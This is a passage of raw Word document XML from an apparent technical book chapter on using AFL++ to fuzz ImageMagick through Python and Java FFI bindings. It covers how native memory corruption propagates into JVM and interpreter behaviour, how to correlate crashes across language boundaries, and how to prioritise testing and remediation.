        <w:t xml:space="preserve">Why does this matter more than just testing ImageMagick in isolation? When native code corrupts memory inside a JVM process, the corruption can affect Java’s garbage collection algorithms, class loading mechanisms, or bytecode verification systems. This means that an ImageMagick integer overflow vulnerability, which might cause predictable crashes when tested in isolation with AFL++, can trigger unpredictable JVM behavior that affects all code running in the same virtual machine—​potentially compromising multiple applications or services that share the same JVM instance.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Building effective Java JNI fuzzing requires understanding how Java manages memory for objects that wrap native resources. When your Java code creates a</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">magick.ImageInfo</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">object through JMagick, Java allocates memory for the Java object while ImageMagick allocates separate native memory for the actual image data and processing structures. Memory corruption in ImageMagick can break the assumptions that Java’s garbage collection system makes about object validity, leading to crashes when the garbage collector attempts to process corrupted object references.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Integer overflow vulnerabilities in ImageMagick create particularly dangerous scenarios when triggered through JNI calls. AFL++ might discover inputs that cause ImageMagick to calculate incorrect buffer sizes, leading to heap allocation failures or memory corruption. When these vulnerabilities trigger through Java bindings, the corrupted native memory can interact with Java’s garbage collection system in ways that cause heap corruption, leading to crashes that appear completely unrelated to the original image processing operation.</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Java JNI ImageMagick Fuzzer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">AFL++ harness that tests ImageMagick vulnerabilities through Java JNI bindings, focusing on integer overflow scenarios that corrupt JVM heap structures</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">High</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Develop a Java application that uses AFL++ to test ImageMagick through JNI calls, specifically monitoring for integer overflow vulnerabilities that affect JVM stability and garbage collection behavior.]</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The challenge with Java JNI vulnerability discovery is that crashes often manifest differently than they would in pure native code testing. An integer overflow vulnerability in ImageMagick might cause immediate crashes when tested with AFL++ in isolation, but when triggered through JNI calls, the crash might be delayed until Java’s garbage collector runs, creating timing-dependent failures that are difficult to reproduce and analyze. This means your fuzzing approach must account for Java’s execution model and memory management characteristics.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Exception handling at JNI boundaries provides another avenue for vulnerability exploitation that doesn’t exist in pure native code. Java applications expect that JNI calls will either complete successfully or throw predictable exceptions that can be caught and handled appropriately. However, certain types of memory corruption can bypass JNI exception handling mechanisms, causing native crashes that don’t get translated into Java exceptions. These unhandled native crashes can leave the JVM in an inconsistent state, creating opportunities for subsequent exploitation or causing application instability that persists beyond the initial vulnerability trigger.</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DIAGRAM</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">JVM Memory Corruption Cascade</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Technical diagram showing how ImageMagick integer overflow vulnerabilities propagate through JNI to affect Java garbage collection and heap management</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">High</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Create a detailed technical diagram illustrating the path from AFL++ input through ImageMagick integer overflow to JVM heap corruption, showing specific points where native vulnerabilities affect Java memory management systems.]</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Resource management boundaries between Java and native code provide additional opportunities for vulnerability exploitation through ImageMagick JNI calls. When native code corrupts memory structures that track resource allocation or cleanup, the corruption can affect Java’s finalization mechanisms or garbage collection behavior, potentially leading to resource leaks, cleanup failures, or corruption that persists across multiple garbage collection cycles.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">String handling in Java JNI contexts creates particularly complex vulnerability scenarios when combined with ImageMagick’s string processing capabilities. Java strings are immutable objects managed by the JVM’s string pool, but when native code corrupts string data through JNI calls, the corruption can affect multiple Java objects that reference the same underlying string data. AFL++ can generate test cases that trigger buffer overflows in ImageMagick’s string processing, but when these vulnerabilities trigger through JNI, they can corrupt Java string objects in ways that affect application functionality far beyond the immediate image processing operation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The debugging and analysis workflow for Java JNI vulnerabilities differs significantly from standalone native library testing. When AFL++ discovers a crash in pure C++ code, you can analyze the crash with GDB, examine core dumps, and use standard native debugging techniques. But when the same vulnerability triggers through JNI calls, you need debugging approaches that understand both the native crash and its effects on the JVM. This often requires specialized tools and techniques that can trace memory corruption across the JNI boundary.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Thread safety considerations add another layer of complexity to Java JNI vulnerability discovery and analysis. Java applications often call native libraries from multiple threads simultaneously, and memory corruption in ImageMagick code can interact with Java’s threading model in ways that create race conditions or deadlocks that don’t exist when the same native code runs in single-threaded contexts. AFL++ testing must account for these threading interactions to discover vulnerabilities that only manifest under concurrent execution conditions.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Building comprehensive Java JNI fuzzing requires correlation between AFL++ native code testing and JVM behavior analysis. You need testing frameworks that can discover ImageMagick vulnerabilities using traditional AFL++ techniques, then automatically test those vulnerabilities through Java JNI calls while monitoring for delayed effects on JVM stability, garbage collection behavior, and application-level functionality that might be affected by native memory corruption.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">These Java JNI testing approaches apply equally to other native libraries that provide Java bindings—​cryptographic libraries like those wrapping OpenSSL, database drivers that use native database interfaces, or compression libraries that handle large data processing. The integer overflow patterns you’ve identified in ImageMagick also occur in compression libraries when calculating buffer sizes, while the JVM heap corruption monitoring techniques work for any JNI interface that might experience native memory corruption.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">With Python and Java FFI testing techniques established using ImageMagick as your foundation, you’re now equipped to tackle the challenge of correlating these cross-boundary crashes when they occur in your production environments.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="143"/>
    <w:bookmarkStart w:id="144" w:name="X18a0d4b7e145b30174e631f8797bb0bb31ac9e6"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">5.4 Cross-Boundary Crash Detection and Analysis</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">You’ve used AFL++ to find several crashes in ImageMagick, and you’ve confirmed that some of these crashes affect your Python and Java applications when triggered through FFI calls. Now you’re facing a correlation problem: when your production applications crash with memory-related errors, how do you determine whether the root cause is an ImageMagick vulnerability that AFL++ already discovered, or a new issue that requires additional investigation?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Successfully identifying FFI vulnerabilities requires more than just running AFL++ against native libraries—​you need focused approaches for detecting how native code crashes affect calling applications and correlating these cross-boundary effects with specific vulnerability triggers. The challenge lies in recognizing that a segmentation fault in ImageMagick might manifest as a Python double-free crash, garbage collection failure in Java, or delayed memory corruption that affects seemingly unrelated application functionality hours after the initial trigger.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Traditional crash detection focuses on immediate, obvious failures: processes that terminate with signal 11, exceptions that propagate to application error handlers, or core dumps that provide clear evidence of memory corruption. However, FFI boundary vulnerabilities often create subtle, delayed effects that escape conventional crash detection mechanisms. When ImageMagick corrupts memory inside a Python process, the corruption might not manifest until Python’s garbage collector encounters the corrupted objects during a routine cleanup cycle. By that time, the connection between the original AFL++ test case and the resulting crash may be completely obscured.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Building effective cross-boundary crash detection requires monitoring systems that understand the lifecycle and memory management characteristics of both native code and managed language runtimes. For Python FFI testing with ImageMagick, you need monitoring that tracks not just immediate crashes, but also garbage collection failures, reference counting inconsistencies, and interpreter state corruption that might indicate underlying native memory corruption. The detection system must correlate these high-level symptoms with the specific AFL++ inputs that triggered the underlying native vulnerabilities.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Memory corruption detection patterns</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">for ImageMagick FFI testing follow predictable sequences that you can monitor systematically. When AFL++ generates an input that triggers memory corruption in ImageMagick during Python Wand processing, look for Python-specific symptoms: unexpected reference counting behavior, garbage collection delays, memory allocation failures that don’t correspond to application resource usage, or exception patterns that suggest corrupted object state.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">For Java JNI testing with ImageMagick, monitor for JVM-specific corruption indicators: garbage collection failures that don’t correlate with heap usage patterns, ClassLoader errors that suggest corrupted class metadata, or thread synchronization issues that might indicate native memory corruption affecting JVM internal structures. These symptoms often appear minutes or hours after the initial AFL++ input triggered native corruption through JMagick calls.</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FFI Crash Correlation Framework</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Monitoring system that correlates AFL++ native code crashes with delayed effects in Python/Java applications, including garbage collection failures and memory corruption symptoms</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">High</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Create a comprehensive monitoring framework that tracks AFL++ test cases through native library execution and into managed language runtime effects, providing clear correlation between specific inputs and cross-boundary crash scenarios.]</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Timing correlation</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">provides one of the most challenging aspects of FFI crash detection. Native vulnerabilities might trigger immediate crashes in standalone testing, but when the same vulnerabilities occur through FFI calls, the crashes might be delayed by garbage collection cycles, threading interactions, or resource cleanup operations. Your detection system must maintain correlation state across extended time periods, potentially tracking thousands of AFL++ test cases while monitoring for delayed effects that might not manifest until minutes or hours after the initial trigger.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Exception propagation analysis</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">helps identify cases where ImageMagick vulnerabilities affect managed language error handling mechanisms. When ImageMagick code corrupts memory through Python or Java bindings, the corruption might interfere with normal exception handling, causing crashes that bypass application-level error recovery mechanisms. Detecting these exception handling failures requires monitoring that can distinguish between normal exception handling and scenarios where native corruption prevents proper exception propagation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Resource leak detection</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">becomes particularly important in FFI vulnerability analysis because native memory corruption can interfere with managed language resource cleanup mechanisms. When ImageMagick vulnerabilities affect Python object reference counting or Java garbage collection, the result might be resource leaks that accumulate over time rather than immediate crashes. These leaks can eventually lead to resource exhaustion that causes application failures, but the connection to the original vulnerability trigger may be completely obscured by the time the failure occurs.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Heap corruption analysis</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">requires understanding how native memory corruption interacts with managed language heap structures. Python and Java both maintain complex heap structures for object allocation, garbage collection, and memory management. When ImageMagick corrupts memory regions that contain these management structures, the corruption can cause cascading failures throughout the managed language runtime. Detecting these corruption patterns requires monitoring approaches that understand both native memory layout and managed language heap organization.</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DIAGRAM</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Cross-Boundary Crash Timeline</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Visual representation of how native code vulnerabilities manifest as delayed crashes in managed language environments, showing timing relationships and correlation challenges</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">High</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Design a timeline diagram that illustrates the delay between AFL++ input triggering native vulnerability and the manifestation of crashes in Python/Java applications, highlighting the correlation challenges that make FFI vulnerability detection difficult.]</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Signal handling differences</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">between native code and managed language environments create additional complications for crash detection. While native crashes typically result in predictable signals like SIGSEGV or SIGBUS, the same corruption when triggered through FFI mechanisms might be caught by managed language signal handlers, converted into language-specific exceptions, or handled through runtime-specific crash recovery mechanisms. Effective detection must monitor for these alternative crash manifestations rather than relying solely on traditional signal-based crash detection.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Application state corruption detection</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">helps identify scenarios where ImageMagick vulnerabilities don’t cause immediate crashes but instead corrupt application data or interpreter state in ways that affect subsequent operations. These corruption scenarios can be more dangerous than immediate crashes because they can lead to data integrity issues, security bypass vulnerabilities, or persistent application instability that’s extremely difficult to diagnose without understanding the underlying native vulnerability.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Building comprehensive FFI crash detection requires orchestration between multiple monitoring and analysis tools. You need systems that coordinate AFL++ native code testing with managed language runtime monitoring, correlate crashes across extended time periods, and provide clear visibility into the relationships between specific vulnerability triggers and their cross-boundary effects. The goal is transforming the complex, delayed, and often obscured symptoms of FFI vulnerabilities into clear, actionable intelligence that guides remediation efforts.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">You now have practical techniques for detecting when ImageMagick crashes propagate into your Python and Java applications. These correlation capabilities provide the foundation for building systematic FFI testing workflows that can guide your security and development teams.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="144"/>
    <w:bookmarkStart w:id="145" w:name="Xb9fd2ee9bdeba62b75be7ca6543119147c47e75"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">5.5 Practical FFI Security Testing and Prevention</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">You understand how to find FFI vulnerabilities and correlate crashes across language boundaries, but now you’re facing implementation questions: Which native library dependencies should you prioritize for testing? How do you balance security testing with development team productivity? When should you implement defensive measures versus focusing on finding and fixing specific vulnerabilities?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Developing effective FFI security testing requires focused approaches that integrate native code fuzzing with managed language runtime testing, creating workflows that can discover vulnerabilities at interface boundaries while providing clear guidance for remediation and prevention. The challenge extends beyond simply finding crashes—​you need testing frameworks that help you understand vulnerability impact, prioritize remediation efforts, and implement preventive measures that protect against classes of FFI boundary vulnerabilities.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Risk-based testing prioritization</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">helps you focus limited fuzzing resources on the FFI boundaries most likely to contain vulnerabilities that could affect your specific applications. This requires analyzing both the likelihood of vulnerabilities in particular native libraries and the potential impact of those vulnerabilities when triggered through your application’s FFI usage patterns. A vulnerability in a rarely-used ImageMagick image format parser might have low priority, while a vulnerability in core image processing code that handles user uploads through Python bindings might require immediate attention.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Building effective FFI testing workflows starts with understanding your application’s native library dependencies and their associated risk levels. Most applications rely on dozens of native libraries through various FFI mechanisms, but not all of these dependencies represent equal risk. Libraries like ImageMagick that handle untrusted input and perform complex parsing operations typically represent higher priority targets for AFL++ testing than libraries that only provide system interfaces or mathematical calculations.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Input surface analysis</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">provides the foundation for effective FFI fuzzing by identifying the specific data paths where untrusted input can reach native code through managed language interfaces. Your Python web application might process user uploads through ImageMagick: image format detection, image processing, and thumbnail generation. Each of these interfaces represents a potential attack surface where carefully crafted input could trigger native vulnerabilities that affect the calling Python application.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Corpus development</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">for FFI testing requires understanding both ImageMagick’s expected input formats and the specific ways your application uses the library through managed language bindings. AFL++ corpus optimization techniques that work well for standalone native testing might need modification when testing through FFI boundaries because the managed language wrapper might impose additional constraints, validation, or data transformation that affects which test cases can reach vulnerable code paths.</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FFI Risk Assessment Framework</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Automated system for analyzing native library dependencies and prioritizing FFI testing based on vulnerability likelihood and impact potential</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Create a framework that analyzes application dependencies, identifies FFI boundaries, assesses vulnerability risk based on library characteristics and usage patterns, and generates prioritized testing recommendations.]</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Harness design</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">for FFI testing involves creating test environments that accurately reflect how your production applications call ImageMagick while maintaining the performance and observability characteristics needed for effective fuzzing. This often requires balancing realistic application context with the simplified, high-throughput testing environments that AFL++ requires for optimal performance. Your harness must exercise the same code paths that production traffic uses while providing clear visibility into both native crashes and their effects on managed language runtime behavior.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Crash triage and impact assessment</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">for FFI vulnerabilities requires understanding how different types of native code vulnerabilities affect managed language applications. A stack buffer overflow in ImageMagick might cause immediate crashes when triggered through Python bindings, making it easy to detect and prioritize. However, a heap corruption vulnerability might cause delayed garbage collection failures that are much harder to correlate with specific vulnerability triggers but potentially more dangerous because they can affect application stability over extended periods.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Remediation strategies</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">for FFI vulnerabilities often involve multiple approaches because you might not have direct control over the native library code. When AFL++ discovers vulnerabilities in third-party libraries like ImageMagick, your remediation options might include updating to patched library versions, implementing input validation that prevents vulnerable code paths from being triggered, or using sandboxing techniques that limit the impact of native code vulnerabilities on your managed language applications.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Input validation and sanitization</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">provide critical defense mechanisms for FFI vulnerabilities, but they require careful design to be effective without breaking legitimate functionality. Python and Java applications can implement input validation that prevents obviously malicious data from reaching ImageMagick, but this validation must understand the specific vulnerability patterns that AFL++ testing reveals. Generic input validation might miss the subtle format corruptions or edge cases that trigger native vulnerabilities while blocking legitimate use cases.</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DIAGRAM</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">FFI Testing Workflow Architecture</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Complete workflow showing the integration of AFL++ native testing with managed language monitoring, crash correlation, and remediation guidance</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">High</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Design a comprehensive architecture diagram showing how AFL++ native library testing integrates with Python/Java application monitoring, including crash correlation mechanisms, impact assessment, and remediation workflow components.]</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Update and patch management</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">for native library dependencies requires structured tracking of vulnerability disclosures, patch availability, and testing requirements for FFI boundaries. When security researchers discover vulnerabilities in libraries like ImageMagick, you need processes that can quickly assess whether those vulnerabilities affect your applications through FFI boundaries and prioritize updates based on actual risk rather than generic vulnerability scores.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Testing integration</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">with development workflows helps ensure that FFI security testing becomes a routine part of software development rather than an afterthought. This requires integrating AFL++ testing into continuous integration pipelines, providing developers with clear feedback about FFI vulnerabilities, and creating testing approaches that can identify regressions or new vulnerabilities introduced during development without overwhelming development teams with excessive testing overhead.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Long-term prevention strategies</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">involve designing application architectures that minimize FFI boundary risks while maintaining the performance and functionality benefits that native libraries provide. This might include using managed language implementations of critical functionality where possible, implementing robust error handling and recovery mechanisms for FFI calls, or designing application architectures that isolate FFI boundary risks through process separation or other containment techniques.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
